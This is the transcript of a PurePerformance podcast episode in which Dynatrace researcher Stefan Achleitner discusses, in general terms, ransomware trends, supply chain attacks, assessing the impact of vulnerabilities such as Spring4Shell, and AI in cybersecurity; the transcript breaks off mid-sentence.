PurePerformance - Don’t look away from the next cyber security threat with Stefan Achleitner
Episode Date: March 13, 2023

While Spring4Shell, ransomware, and attacks on critical infrastructure were the most severe attacks in 2022, the evolving trends in 2023 are around the rising power of AIs, the complexity and therefore misconfiguration of cloud-native stacks, as well as social engineering challenges as part of the post-pandemic shift back towards the office. Tune in and learn from Stefan Achleitner, Lead Researcher Cloud Native Security at Dynatrace, about getting better at securing the software supply chain, understanding the impact of attacks and vulnerabilities, and why nobody should look away when it comes to detecting and preventing cyber security threats.
Transcript
It's time for Pure Performance!
Get your stopwatches ready, it's time for Pure Performance with Andy Grabner and Brian Wilson.
Hello everybody and welcome to another episode of Pure Performance.
My name is Brian Wilson and as always I have with me my co-host,
the wonderful and talented Mr. Andy Grabner.
Andy, how are you doing today?
Very good, but I'm a little surprised now, because you announced that you had actually rehearsed this whole intro, but it didn't sound anything different.
Well, I haven't gotten to it yet, and I gave it away, so now everyone's going to know. So anyway, I've got to tell you, I had a very, very weird dream last night. You were in it. So I was walking down Grubenstraße. And did I get that right?
Street?
Yeah, Straße.
Yeah, cool.
Yeah, yeah.
Okay.
And I don't know how to do that weird B character.
And suddenly I hear, hey, Brian.
And I look and it's you in an alley.
But your voice is obviously different, right?
It's very much harsher and more masculine.
And I'm like, Andy, what are you doing here in Linz?
And he's like, Brian, come here.
So I go into the alley with you, and you're like, I need to show you something.
And you pull out your phone.
You like my impersonation of you, right?
And you show me on your phone a picture of my children bound to chairs.
I'm like, Andy, what's going on here? I thought we were friends. What are you doing?
And he's like, I took your children hostage. If you want to get them back, you have to pay a ransom.
And I was like, this is now a Scottish accent, though, that you're doing?
I'm not Scottish.
It was like a Scottish accent, almost. So then I'm like, wait a minute, Andy, let me get this straight. You have my children hostage.
You want me to pay a ransom to get them back.
Otherwise you keep them.
You're like, yes, that is right.
And so I said, all right, well, enjoy my kids. 'Cause you just set me free. So thanks.
But anyway, I figured it was appropriate to bring up today because, you know, it's, I think, a little bit on topic.
Yeah, maybe a little bit on topic.
A little bit. Like how bad
of a dad you are that you didn't want to
give your kids away?
Or you're talking about
keeping the things that
are precious to you safe and
sound. And secure.
And secure, right? In the Austrian way,
for kids, we typically put them
into basements and lock them in so that nobody can steal them.
I think this is enough with the jokes today.
Yeah, exactly. I think enough with the jokes.
The topic today is security.
And Brian, I think in the last year or year and a half, when we talked about security, we often talked about Log4Shell and Log4j. It felt like this topic kind of took over the security world,
at least in our small security world that the two of us live in,
because we are just hearing what our listeners kind of bring to us.
But to learn a little bit more about what else is out there in security,
we've actually invited Stefan Achleitner today to the show.
Stefan, sorry for going
through all of this, trying to be funny
in the beginning, but finally
it's time for you.
I'm apologizing for the jokes. They didn't work too well.
I was proud of that one,
ladies and gentlemen.
It was good.
Stefan, finally, thank you so much for being on the show.
Could you do us a favor, say hi to the audience
and quickly introduce yourself, who you are, what you do,
and why you think you're on the podcast today?
Sure, yeah. I'm very excited to be on the podcast.
So it was funny to listen to your intro.
So I've been with Dynatrace for about a year now.
My one-year anniversary is coming up soon, actually.
And I've been working in the field of cybersecurity
for about, yeah, 10, 12 years.
I actually got into it when I moved from Austria to the US,
which was about 12 years ago,
to study cybersecurity.
And then I worked a few years in California for some other security
providers, mostly focused on threat detection, attack detection, understanding how attacks work,
how you basically develop new models, new approaches for advanced attack detection.
And yeah, about a year ago, I got the chance to actually lead
the security research here at Dynatrace,
which was a very exciting opportunity
that I took.
And I'm really, really happy
about this opportunity.
And very recently,
I moved back to Austria,
where I'm originally from.
So it's nice to spend time again with family, and not just come home once a year, but more frequently. So it was a great combination: the Dynatrace job opportunity, and moving again.
In which lab do you work?
My main office is in the Vienna lab, but I'm very frequently also in Linz.
The team that we have working in security research is mostly in Linz, but some people are also in Vienna.
And Stefan, also maybe for the audience: we will discuss a lot of topics. You did a great job giving us some background details on what we should discuss, what actually matters to the security-aware people out there.
And folks, if you hear anything we discuss, let's say a particular article or something like that, we always try to follow up with links. So Stefan, also for you, if you have any additional material, any papers, blog posts, then we'll try to add them to the description of the episode.
Definitely.
Yeah.
But I really want to jump into the topic, because, as I said, typically when we get in touch with security, and especially in the last year and a half, most of it was centered around Log4Shell and Log4j, and then things like Spring4Shell.
So kind of looking back on what happened in the last year,
can you give us a little overview of what attacks were out there?
Was it really just Spring4Shell or Log4Shell? Were there other things out there as well that didn't make it into the news as prominently, but that everybody should be aware of?
Yeah, actually, Log4Shell, I don't want to go into that because, as you already said,
people talk so much about it.
But if we look a year back, Log4Shell was very prominent.
And the interesting thing is that just a few months after Log4Shell, Spring4Shell came around, which was a very similar vulnerability that actually affected a lot of companies and a lot of software, because it was part of the Spring Framework.
And I don't want to talk too much about Spring4Shell at the moment, but maybe a little bit more later, because it's a really nice example of what I think we need to do, or where research needs to go, to better understand those types of vulnerabilities. So that was certainly a big thing in the past year.
One other thing that I recently read in studies, and that was kind of surprising to me, but you can explain it if you think about it, is that ransomware attacks are still very big.
I'm sure everybody heard about ransomware attacks, right?
When you encrypt basically the data and then ask for ransom.
And actually, what we saw in about the second half of last year is that ransomware attacks are going down, which means not as many companies report anymore that they were attacked by ransomware.
So we really see the trend going down.
And there are multiple reasons for that.
So, I also did a little bit of work on ransomware, and from the very beginning, when it all started, people always said, or organizations like the FBI in the US, for example, and also security providers said: don't pay the ransom, because it actually enables attackers, or motivates attackers, to keep doing that, right?
And also, you fund the attackers that are doing that.
Sorry to interrupt, but this is a really interesting thought.
So basically, by giving it so much public attention, the criminals kind of learn: hey, this is actually working, and it's working pretty well, so let's do it as well.
By talking less about it, we can downplay the impact it can have, and therefore hopefully encourage fewer criminals to actually do it.
Do I get this right? Is this kind of the...
Somewhat, yeah, somewhat.
There are a few factors why it's going down.
One of the factors is that it's actually getting harder to pay the ransom. Because if you look back at how ransomware started, cryptocurrencies were basically an enabler for ransomware, right? Because suddenly you can pay large amounts of money in a basically anonymous way. And this is getting harder and harder to do, because countries are starting to regulate cryptocurrencies.
And also, if you look at big crypto exchange sites like Coinbase, for example, they have limits.
You cannot just go there and say, hey, I want to buy $2 million worth of Bitcoin.
They will not give that to you in a day. And if you tell them, oh, it's to pay off some attackers for a ransomware attack, they will not do that, right?
They will not give you the money.
So it's getting harder and harder for the victims
to actually pay it, which is a good thing.
And actually, in a study that I read last year, people did some investigation: only 8% of the organizations that paid a ransom actually got their data back. Only 8%. So it's really not a good idea to pay a ransom.
And I think more and more organizations are starting to realize that. And so the business model is basically slowly disappearing for attackers, and that's why we see the trend going down.
So the fact that the ransomware hackers are bad businessmen and don't give the data back is ruining their own business model, because people are like, well, if I pay you, I have an eight percent chance of getting it back. So it's their own bad business practices which are killing them, which is funny.
I also imagine, too, and I don't remember if this one was in the document and all, but when we talk about cryptocurrencies, I imagine the instability of that market is also making it less attractive for the ransomware hackers, because, you know, 2 million in Bitcoin today, tomorrow might not be worth anything.
Exactly. Yeah, that is a good point.
I mean, for me, I never thought about this,
but it makes a lot of sense.
That's why we have these podcasts.
We always say, Brian and I, that we actually benefit the most from these podcasts, because we always learn so much from our guests.
And thank you so much, Stefan, for bringing this up.
Now, you also said that technology is catching up.
You mean with technology, really the defense mechanisms, I guess, right?
Yes, correct.
Correct.
Right.
Right.
So, I mean, ransomware was something new, and you see that the technology to detect it is just catching up.
There are frameworks out there that basically allow you to just create ransomware, and more and more vendors detect it. So that's also a factor. So really, multiple factors come together, and we see ransomware attacks going down. And also people are getting more wary. But I don't want to say, hey, you don't have to worry about that anymore.
You should still be very cautious about that.
Yeah, I think I just want to add in one last thing too,
that I think at least for the home market of ransomware,
this doesn't really apply to the business side of it,
but there are plenty of people
who get their computers hacked.
I actually know somebody who called me up and was like, hey, what do I do? My computer has been ransomware-hacked.
My first question was, well, where do you back up all of your important stuff to? And he goes, uh...
But the thing is, so many laptops, your phones, your devices, they come pretty much set up for you to easily turn on auto-backup, right? So if you have an iPhone, you can easily be storing all your photos, all that sentimental stuff that you want to keep, in a backup somewhere. So if someone gets your device, it's like, all right, great, you got my device. I'll throw that out and get a new one, because everything else is backed up somewhere safely.
I imagine that's not quite the same for businesses and the hospitals and all those other people that are getting hacked on that side.
Exactly, yeah.
Stefan, anything else to wrap up what we saw last year?
Yeah, I mean, one trend that we've also seen is that the war of Russia on Ukraine actually also really drove a trend that we saw in different malwares. We talked about ransomware, where there is a financial interest for attackers in an attack, right?
What we really saw when the conflict in Ukraine started is that there's suddenly malware that is only destructive, that really only wants to disrupt critical infrastructure, really just to wipe out computers without giving you the option to recover them.
It's really destructive malware with no other goal than just to do damage, no financial interest.
So this was really a trend that came up in spring last year when this whole conflict started, which was interesting to see, but also scary to see, right? That really this unfortunate war is also really happening in cyberspace.
Yeah, it's a full-on cyber war at this point, right? Interesting. I didn't know that was going on. Over here, I didn't hear about that. Now, if they were smart, here's an idea for them.
If they're smart, they'll be like,
you have 10 days to pay or we destroy.
And then they get some of the Bitcoin, maybe,
and then they destroy anyway.
So they get double bounty.
Brian, don't give these people
that listen to our podcast any new ideas.
Someone's thought of it.
Somebody's thought of it.
Yeah.
It's all going to be created.
That Brian Wilson. Exactly.
Hey, Stefan, that was really insightful, especially for me. I guess ransomware obviously was something I had on the radar, because we also heard about it in Austria. I remember certain local governments and hospitals were impacted by it, and obviously the conflict in Ukraine is very, very close to our doors here.
And that's why we hear a lot of this also in the news.
I'm moving a little further ahead now, looking at current challenges, because obviously, I guess we are not just making life harder for attackers; they will also get creative and come up with some new things, right? If you make things harder, then people become innovative.
So what are kind of the current challenges that you see out there
in cybersecurity? Is there anything you can tell us?
Yeah, there are certainly many challenges. In general, you can talk about the attack surface, so basically the possible ways to attack certain systems. It's just growing, growing every day.
The more we are connected, the more digital products we use, the larger our attack surface gets, basically.
That's just a fact.
One really important thing for me is that we start to better understand, and start to build better defenses around, the software supply chain.
There were also recent attacks on the software supply chain.
I'm sure you all heard about, for example, the attack on SolarWinds, or also the attack on the Colonial Pipeline, which actually happened when I still lived in the U.S.
And you really saw gas prices going up on the East Coast.
And so this is really a very important angle for me in cybersecurity: to better understand where certain software components are coming from.
Because if you look into modern software, it's not written from scratch, right? You use libraries that are either proprietary from vendors or that are coming from open source repositories,
for example. And so you have so many different levels and so many different angles where you could have a supply chain attack, which would basically mean someone is smuggling a piece of malicious code into your whole benign supply chain.
So that can happen that someone embeds something that harvests data from your machine into a library that maybe just draws charts, right?
And so understanding where the software is coming from, but also understanding how software behaves, finding out what the expected behavior is and how it should not behave, that's something I think will become more and more important to be able to
detect such kind of attacks. What I mean by that is, if you think about a library that just draws
charts, right? You give it data and it gives you back a picture. If such a component would suddenly
start to, for example, send out a lot of network data that you could certainly monitor,
there is something fishy going on, right?
Like, why is it doing that?
And so to understand the behavior of certain components,
how our software is constructed,
I think this will be a key factor
in order to detect such kind of supply chain attacks
that I'm pretty sure we'll get more.
Because, as I said, if you consider the whole software supply chain, you have so many different levels where you can attack.
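To make the behavioral idea above concrete, here is a minimal sketch, not from the episode: a component's observed actions are compared against a recorded baseline, and anything outside the baseline is flagged. The component names, action labels, and profile format are all invented for illustration; real tooling would derive the baseline from observed syscalls or traces.

```python
# Hypothetical behavioral baseline per component. A chart-drawing library
# is expected to read input and write an image, but never to open
# network connections.
BASELINE = {
    "chartlib": {"file_read", "file_write"},
}

def check_behavior(component: str, observed_actions: set[str]) -> list[str]:
    """Return the observed actions that fall outside the component's baseline."""
    allowed = BASELINE.get(component, set())
    return sorted(observed_actions - allowed)

# A chart library suddenly sending network data is suspicious:
anomalies = check_behavior("chartlib", {"file_read", "file_write", "network_send"})
```

The interesting design question in practice is where the baseline comes from; learning it from production observation is exactly the kind of research direction discussed here.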
Yeah, this reminds me of last week, when we had Tracetest on, a company that is doing validation of distributed traces.
And the point is, right, they are capturing distributed traces, let's say OpenTelemetry: you're capturing an OpenTelemetry trace of an application that you're testing, and then you're validating in the end whether that trace actually looks like what you expect. So in your example, rendering an image: you have this feature in a microservice, and then you're looking at the trace and you're expecting it takes
that amount of time,
that amount of CPU memory,
and maybe it makes one call out
to fetch something from the file system
and that's it.
But if all of a sudden
that trace looks differently
during testing,
something has changed
and then you want to flag it.
But I also think it's interesting that you'd probably want to do this also in a production environment, where you say: I want to keep validating whether my transactions, whether my code, still has kind of the same fingerprint, or the same kind of behavior, for certain activities.
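As a rough sketch of what such trace validation could look like: the span fields and expected-call set below are invented; tools like Tracetest express this as assertions over real OpenTelemetry traces.

```python
def validate_trace(spans: list[dict], expected_calls: set[str],
                   max_duration_ms: float) -> list[str]:
    """Flag spans that are not part of the expected fingerprint, or too slow."""
    findings = []
    for span in spans:
        if span["name"] not in expected_calls:
            findings.append(f"unexpected call: {span['name']}")
        if span["duration_ms"] > max_duration_ms:
            findings.append(f"slow span: {span['name']}")
    return findings

# A captured trace for the "render an image" feature (simplified spans):
trace = [
    {"name": "render_chart", "duration_ms": 40.0},
    {"name": "read_filesystem", "duration_ms": 5.0},
    {"name": "post_external_api", "duration_ms": 120.0},  # not in the fingerprint
]
findings = validate_trace(trace, {"render_chart", "read_filesystem"}, 100.0)
```

Run during testing, a non-empty findings list would fail the build; run continuously in production, it would raise an alert when the fingerprint drifts.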
And Brian, this also reminds me of the performance signature that we had back in the days, which kind of evolved into what are now our quality gates. Basically figuring out how the software behaves and giving it a fingerprint, and then you say: if it doesn't behave that way anymore, then something has changed. And if that changed behavior comes out of nowhere, then this is suspicious.
Yeah, I could see that being really challenging, too, though,
because if you're talking about organizations
that have a really fast-paced release cycle,
like the Amazons of the world or something,
I mean, unfortunately, there's not too many regular companies
that are that fast-paced,
but that sort of thing becomes a challenge.
I think the interesting thing is: the more you try to keep up with it, like if you're just looking at the network payload and looking for large chunks of extra network traffic to protect yourself, that, like any sort of criminal activity, is going to force the criminals to get smarter and be like, well, instead of larger chunks, what if we do a lot smaller bits of data, but constant?
So it's a very tiny little difference.
It's going to force them to evolve, and it's always going to be this,
what they call the cat and mouse game.
But I think that's just the nature of humanity.
I guess we'll turn this into a humanity-philosophical discussion.
No, but it's just funny.
The more you try to get ahead of it, the more it forces the hackers to innovate because there's no real way to get them to stop.
Without some ideological, maybe if aliens come down and we all unite finally.
But then someone will go to work for the aliens to get our data for them anyway.
So I'm full of ideas today.
But yeah, no, very interesting stuff. I think there definitely can be some sort of fingerprints, you know, of code execution, if you will.
Yeah, exactly. This fingerprinting, this profiling of software to understand what it really does.
I think this is just very critical for cyber security.
You mentioned the term open source earlier, and I don't want to open up a can of worms here,
because I know this is a bigger discussion. But obviously, the open source, I guess it always
goes in multiple ways. But some people say, yeah, we cannot use open source because maybe the source code is open.
And if there's a vulnerability, everybody knows the vulnerability.
And then if we even say we're using this library because we make a public endorsement and they also know that we are using this library.
But I also think that open source obviously is here to stay.
And without open source, we wouldn't be where we are.
So what is your quick take on it? What can, or what should, open source projects do to make sure they're not labeled as, yeah, we will not use you because of security concerns?
There's a saying in security that security by obscurity usually is not a good approach.
It doesn't work. Which means: if you hide something, if you don't tell people exactly how things work, that doesn't prevent it from getting attacked.
And that's how I see open source. Because if you have a large open source project
where a lot of people are working on it,
it's actually a very good vetting process
that you say, okay, I maybe have a few people
that have malicious intent,
but I think the majority of the people will have good intent.
And if it's open source, everybody can see it.
And the people that are really trustworthy
or that have good intent,
it's more likely that they catch that there's a vulnerability
or that there's a malicious piece of code in an open source repository
than if it's completely closed, right?
If you have a supply chain attack on a proprietary software,
there's only a limited group of people that can really review the code and detect it.
If we have open source, everybody can do it and a much larger group of people will potentially see it.
So from that perspective, I think we can trust open source software even more.
Yeah, it's interesting, because if you think about the ones that we know of with regard to supply chain, as you were talking about, the big one that everyone knows about was SolarWinds.
And that was not open source.
And for all the open source advocates out there, they'll probably be really into finding it and stopping it as soon as possible to protect open source.
So they're equally motivated to be on top of it.
And if something does get found, get their heads together and fix it right away so that they don't have a tarnished reputation
and everything that they love and been working on.
Whereas a private company will be like, well, their actuaries will be like, well, this will only cost us, you know, $3 million, which we can easily swallow, and then do some PR or whatever.
Whereas the open source community, you live and die by that.
So I think, to your point, they might be a lot more motivated to stay on top.
I never really thought of it that way.
So, yeah, interesting.
Is there anything else on this kind of topic that you want to highlight before we move on?
Yeah, so you mean specifically for supply chain attacks?
Yeah, in general, like current challenges.
Yeah, so one very important thing that I also think will become more and more relevant is that we better understand the impact of certain vulnerabilities. To explain what I mean by that, I would actually like to go back for a few seconds to the Spring4Shell vulnerability.
If you look at how this vulnerability was exploited, it had a lot of very specific conditions that need to be fulfilled in order to exploit it.
It needs to run on Java greater than 9.
It needs to be deployed on a Tomcat server.
It needs to be deployed as a WAR file, for example.
These very specific things were written in the vulnerability description.
So it means that if any of this was not fulfilled, you cannot exploit it.
And so if we better understand all these different conditions and the context that a certain vulnerability is in, we can much better assess the impact a certain vulnerability can have.
And so it's not always the best solution to just say, hey, just upgrade.
If you have a vulnerable Spring framework running somewhere in your environment, just upgrade.
You have to really consider the entire context, the entire infrastructure
that it's running in.
And so if we find a good way to better do that and to better understand all those conditions,
make it processable and somehow gather all this information, then we just can much better protect ourselves
because we can say, okay, I know I have this vulnerability,
but it would actually maybe be worse to replace it
with another thing, for example, right?
But I can turn a lot of other knobs, basically,
to prevent a certain exploit of this.
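The kind of precondition check described above can be sketched as follows. The condition set mirrors the Spring4Shell example from the conversation (JDK 9 or newer, Tomcat, WAR packaging); the environment fields and function names are assumptions made for illustration, not a real advisory format.

```python
# Invented precondition checks modeled on the Spring4Shell example:
# the vulnerability only applies if every condition holds.
SPRING4SHELL_CONDITIONS = {
    "jdk": lambda env: env["java_major_version"] >= 9,
    "server": lambda env: env["server"] == "tomcat",
    "packaging": lambda env: env["packaging"] == "war",
}

def exploitable(env: dict, conditions: dict) -> bool:
    """All advisory preconditions must hold for the exploit to apply."""
    return all(check(env) for check in conditions.values())

# This instance runs the vulnerable library, but as an executable JAR,
# not a WAR on Tomcat, so this particular exploit path does not apply:
env = {"java_major_version": 11, "server": "tomcat", "packaging": "jar"}
```

The point of the passage is that once conditions like these are machine-checkable, you can prioritize fixes by actual exploitability instead of upgrading everything blindly.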
And I think that's great.
I mean, we don't want to use the podcast here for commercials, but regarding what we are doing during the day: we work for Dynatrace, and I think the AppSec capability that we have brings exactly that context you just explained.
We know not just that there is a vulnerable version of Log4j on your file system; we know exactly whether it was loaded into an environment that meets all of the criteria.
Now, here's a question for you: is the description of vulnerabilities good enough?
That means is there a standard
that is currently already available that we get from
the vulnerability databases out there?
I know we are integrating with Snyk, for instance, and maybe others as well.
Is that description that detailed, that it contains all this information, the context?
Unfortunately, not. It sometimes has that information, but it has it in written form.
So not in a machine-readable way, just in a human-readable way.
And it's often also not accurate enough; there are mistakes in it.
And if you look at a certain vulnerability description, you have a lot of information that maybe also points to different links: points to a repository where someone tried out the exploit, or there's a security advisory from that company or from another company.
If you somehow would be able to put all these things together, then you might get all this information. But this is incredibly hard to do.
And so, yeah, short answer: no, it does not have this information. That information might be somewhere, but it's hard to get. It's not just one click and you've got what you need. It's one click, and then you might have to go do more research on the next thing and the next thing and the next thing, and then try to put that all together.
That's completely news to me. I always thought, like, when you read the CVEs or whatever, it's like, yep, this is all you need. It's interesting to find out that it's a lot more complicated.
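To illustrate the gap Stefan describes, here is a toy record shaped loosely like a vulnerability database entry. The structured product identifiers (CPE strings) are machine-readable, but the exploit preconditions live only in the free-text description. The record content is invented for illustration; only the CVE number (Spring4Shell's) is real.

```python
import json

# Illustrative fragment, loosely shaped like an NVD-style record.
record = json.loads("""
{
  "id": "CVE-2022-22965",
  "description": "Remote code execution when deployed as a WAR on Tomcat with JDK 9+.",
  "cpe_match": ["cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*"]
}
""")

def affected_products(rec: dict) -> list[str]:
    """The product names are machine-readable; the preconditions are not."""
    # CPE 2.3 format: cpe:2.3:<part>:<vendor>:<product>:...
    return [cpe.split(":")[4] for cpe in rec["cpe_match"]]
```

A scanner can match the product automatically, but to learn the Tomcat/WAR/JDK conditions it would have to parse the English sentence, which is exactly why the information is "there, but hard to get."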
And you also said machine-readable, which I thought was very interesting, because as you and Andy were discussing this topic, I couldn't help but think about it. You talked about automatically moving to the next version to upgrade and all, and I think obviously upgrading is a large factor, keeping on top of the latest fixes and the latest security patches. But that, I think, for a lot of organizations is a hard thing to do, because you update code, you've got to go through a whole cycle: you've got to go through testing, verification, whatever.
You update a component of your operating system,
at least in the past, they would do the same thing, right?
Because you don't know how that's going to interact
with your code or anything else.
Same thing with the packages.
Okay, yeah, we're going from Java 9 to Java 9.2.
Well, what changed in there?
How's that going to impact?
We got to go through this whole cycle.
And when you're not utilizing an automated pipeline
in this process, you're slowing yourself down.
It's not going to solve everything, but like with this whole machine-readable idea,
when people look at, do we take the time, do we slow down our release cycle to really automate our pipeline
and do things as automatically as we can to save as much time in that and be as agile in that as we can be,
oftentimes the answer is no, because they want to focus on the business. But this is increasing their vulnerability, because they cannot take action quickly; they cannot stay on top of these things. If it was no problem to say, okay, we'll put the latest one in, that'll cost us maybe half a day in the pipeline (I'm just making up a figure), as opposed to a week and a half in the old days? Fantastic. You have a lot more ability to stay on top and not get hit, because when you do get hit by these things, it's much, much more impactful, right?
But I think everybody, as we were doing earlier when we were covering our eyes, everybody likes to hide their head in the sand and say, it's not going to happen here, it's not going to happen to me, and we'll just keep going along as if it's not going to happen, until it does, you know, and then you pay a huge price.
But bringing it back: machine-readable would fit right into that whole bit, right? Because then it could just be part of this automated cycle.
Right. Yeah, as you say, sometimes it's really hard to just
update a certain library or certain component in your entire IT system, right?
But if you say, hey, instead of updating, I can just block certain types of network packets
or limit the rate of certain type of network packets to prevent a certain vulnerability,
that might be much easier than updating a library everywhere.
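The mitigation Stefan mentions, limiting the rate of a certain traffic class instead of upgrading the library, can be sketched as a token bucket. In practice this would live in a firewall, proxy, or service mesh rather than in application code; the parameters here are arbitrary.

```python
import time

class TokenBucket:
    """Allow a short burst, then throttle to a steady refill rate."""

    def __init__(self, rate_per_sec: float, burst: int):
        self.rate = rate_per_sec
        self.capacity = burst
        self.tokens = float(burst)
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill proportionally to elapsed time, capped at the burst size.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

# With a very slow refill rate, a rapid burst of 8 requests sees the
# first 5 (the burst capacity) pass and the rest dropped.
bucket = TokenBucket(rate_per_sec=0.1, burst=5)
results = [bucket.allow() for _ in range(8)]
```

Applied to the traffic pattern a known exploit depends on, this kind of knob can buy time until the library upgrade has gone through the full release cycle.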
Hey, Stefan, I know in your list you also had the human factor.
That's obviously a big topic.
The human is often the weakest link.
But considering that we've already been at it for more than 30 minutes, I would like to skip this one and just go into the next big section, which is really interesting, because, you know, we talked about the past, we talked about the present, but now we need to talk about what's evolving, what's happening, what's coming this year. What do we need to look out for? What are some of the trends that you see out there in cybersecurity in 2023?
Yeah, so AI is, and will be, and in the past year also was, a big, big topic for cybersecurity.
And there are really multiple angles here.
The recent developments in AI, I mean, I know everybody's just talking about ChatGPT.
It's incredible. You tell it, hey, write me a function in Python, and it does it, or whatever you want it to do.
So I think we will see very soon that AI will develop its own malware. The trend is certainly going in that direction.
But on the other hand, AI is also very important to help defend against threats, against attacks, to detect them.
You have to consider that most of the security products we currently have in the industry, and I'm talking about antivirus software, firewalls and so on, are mostly
still pattern-matching and signature-based.
The idea is: I know something that happened in a past attack, and now I look
for that pattern again.
That is still, for the most part, how it works.
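To make the "pattern matching" point concrete, here is a toy sketch of a signature-based scanner. The signature names and byte patterns are chosen for illustration, not taken from any real product; the first one loosely resembles a Log4Shell-style lookup string, the second is the well-known EICAR antivirus test string:

```python
# Toy signature-based detector: flag payloads containing any known byte
# pattern from past attacks -- the "I've seen this before" approach.
SIGNATURES = {
    "jndi-lookup": b"${jndi:ldap://",   # Log4Shell-style payload fragment
    "eicar-test":  b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE",
}

def scan(payload: bytes):
    """Return the names of all signatures found in the payload."""
    return [name for name, pattern in SIGNATURES.items() if pattern in payload]

print(scan(b'GET /?x=${jndi:ldap://evil.example/a} HTTP/1.1'))  # ['jndi-lookup']
print(scan(b'GET /healthz HTTP/1.1'))                            # []
```

The weakness Stefan points out is visible here: any payload the pattern list has never seen before sails straight through, which is exactly the gap context-aware models are meant to close.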
But AI can help with that, because AI is not just making a zero-or-one decision.
AI can also understand some of the context if you have appropriate models. So AI has an angle here:
it can be used for attacking, but it can also be used for defending. So it's really a double-edged
sword, as they say. And then maybe a third factor that we also have to consider: AI is attackable itself. It's actually
still a very hot topic in security research.
You can actually fool an AI. And I've also seen
certain tweets about ChatGPT where people ask it
something and it replied complete nonsense.
And that's actually been known for a few years already. But if you think about self-driving cars, people have shown
that you can very easily fool how an AI detects certain traffic signs. If you just
manipulate a few things on a stop sign, a sign that would normally be identified as a stop sign, right,
the AI in a car, for example, would identify it as, I don't know, a speed limit sign.
Especially if you think about those very deep neural networks that are usually applied for these kinds of tasks:
I would say only a handful of people really understand how they work, because they are such complex mathematical systems that we don't fully understand them
yet.
And they are much easier to fool than you would actually think.
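The stop-sign effect can be reproduced in miniature. The sketch below uses a toy linear "classifier" and the fast-gradient-sign idea: every input coordinate is nudged by at most `eps` against the model's score, which is enough to flip the predicted label even though no single coordinate changes by more than that small bound. All the numbers and names here are invented for illustration; real attacks target deep networks, not a linear model.

```python
import numpy as np

# Toy linear "sign classifier": score > 0 means "stop", else "speed limit".
rng = np.random.default_rng(0)
w = rng.normal(size=10_000)        # fixed "trained" weights
x = w / np.linalg.norm(w)          # an input the model confidently labels "stop"

def predict(x):
    return "stop" if w @ x > 0 else "speed limit"

# FGSM-style perturbation: move each coordinate by eps against the score.
# The gradient of (w @ x) with respect to x is just w, so subtracting
# eps * sign(w) lowers the score as fast as possible while changing
# no coordinate by more than eps.
eps = 0.02
x_adv = x - eps * np.sign(w)

print(predict(x))      # "stop"
print(predict(x_adv))  # "speed limit"
```

The same mechanism scaled up is why a few stickers on a physical stop sign can flip a vision model's output: many tiny, individually harmless changes add up in exactly the direction the model is most sensitive to.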
And so those are really the three factors:
AI itself can be used for attacking and for defending, but then AI itself is not secure yet, and that's
really a big, big research field that I think we will have to invest much more time into. Yeah,
so I could talk much, much longer about
the AI thing, because
there are many
challenges but also many opportunities when
it comes to AI. Also, just to
make a system behave
accurately enough that
it can be applied in a security context
is
really not trivial in an AI system.
Yeah.
It almost sounds like you're describing, at least the beginning part of the AI, the Marvel
movie version of Ultron.
As it's going through and trying to find all the attack vectors and all, it suddenly starts
realizing, oh, there's all these attack vectors.
I can take care of them and then run everything. But the simple fact of the matter, it's very interesting that you talked
about these applications with AI, because just yesterday I heard two stories about AI. One was
about ChatGPT and its use in schools, and how some teachers, they know it's inevitable. They know
these things are going to be there. So they're trying to find good ways to use them. But the
other challenge teachers are finding is kids will go in and be like,
write me a paper about Wuthering Heights, right, or some book, and it's spitting out an essay for
them. So now there's the challenge of trying to detect and identify AI-written essays,
which is very similar to this other thing, right? I also heard a story on NPR last night about the self-driving
car, you know, the Tesla self-driving feature, and somebody did a test
with it, and they described it as being like a driving instructor. It's not relaxing at all. It's
like being a driving instructor because you kind of have to keep your eyes on it, making sure it's
not doing the wrong thing, and questioning what it's doing. So they were
describing it almost like, I feel like I'm driving with a fourth grader behind the wheel.
But a few years ago, it felt like driving with a kindergartner behind the wheel.
And where they were going with this is, this is going to keep getting better. The AI,
whether it's security, whether it's anything, is going to keep getting better. So to your point,
we have to get on top of it.
And I think we asked this question to someone else.
I think they were originally from the United States, so they had a little bit of a conflicted view.
I'm curious as to your more worldly view.
You said a lot of this AI and security stuff is going to take a lot of investment. Just like with the field of antibiotics, I don't
see a desire for companies to invest into this unless there's an incentive. And that incentive
is usually in the form of harsh penalties for being in violation or having to pay a fee.
Right now, your credit card data gets stolen. They give you this meaningless,
oh, we'll keep an eye on your credit card history for a year.
And then we automatically enroll you and you start paying us.
It's all just like there's no real penalty for getting hacked.
There's no real penalty for having lax security.
But if you talk about that funding, you talk about that investment: from where you sit, you've seen a lot of the development on, you know, the Silicon Valley
side, let's just say, and I'm not sure exactly where you were, a bunch of different other areas.
Do you feel that the industry, just based on your experience, would actually be motivated
to put enough time and money into this without being incentivized by penalties? Or do you think
some sort of, like, you know, government regulation, which,
sometimes, you know, is not always perfect, obviously,
would be required for us to see a real improvement here?
To be honest, it is a very hard question to answer, because,
how should I start?
Nobody likes to have, or no company wants to have, a security issue
or vulnerability in their product, right? And usually you don't put this in...
So vulnerabilities can happen. Systems are just so complex, and that
is especially true for AI, that I feel like it's often out of our control,
and it's hard to basically predict what can happen
and what will not happen with certain use cases.
When you, for example, put out a product
that is trained on certain data,
you don't really know how it will behave in a different environment.
That actually brings me to one important point that I have on my list,
and this is about data regulations in different geographical areas.
So as I mentioned, I've worked for many years in the United States
and I did a lot of work in
data science and training machine learning models, for example.
And I was not able to work with European data because I was sitting physically
in the United States and GDPR prevents me from looking at European
data,
which has a lot of good effects for personal privacy. But you have to also consider that
a lot of digital products that we use around the world are developed in the United States
and maybe only trained on data that is collected in the United States or in certain geographical
areas. Because of regulations like
that, and especially in security, you see different attack trends in different
geographical locations. So does it mean that a product that's developed
in the U.S. based on U.S. data does not work as well in Europe? Potentially, yes. But it's
hard to answer, right? So that's
what I mean. It's
sometimes out of developers' control
that you say
in whatever context my products are
applied, they might
behave in a way that I cannot
predict.
And will
penalties motivate companies? Probably to have some minimal standards, yeah,
I think. But it would not prevent all kinds of security flaws, all kinds of vulnerabilities.
Just, I would say, like a minimum level, maybe. Does that make sense?
Yeah, absolutely. And I think those are
fantastic points. And I think, tying into that, all that kind of stuff is driven, like
everything is, by money in a lot of ways. So the companies are on the hook for having that
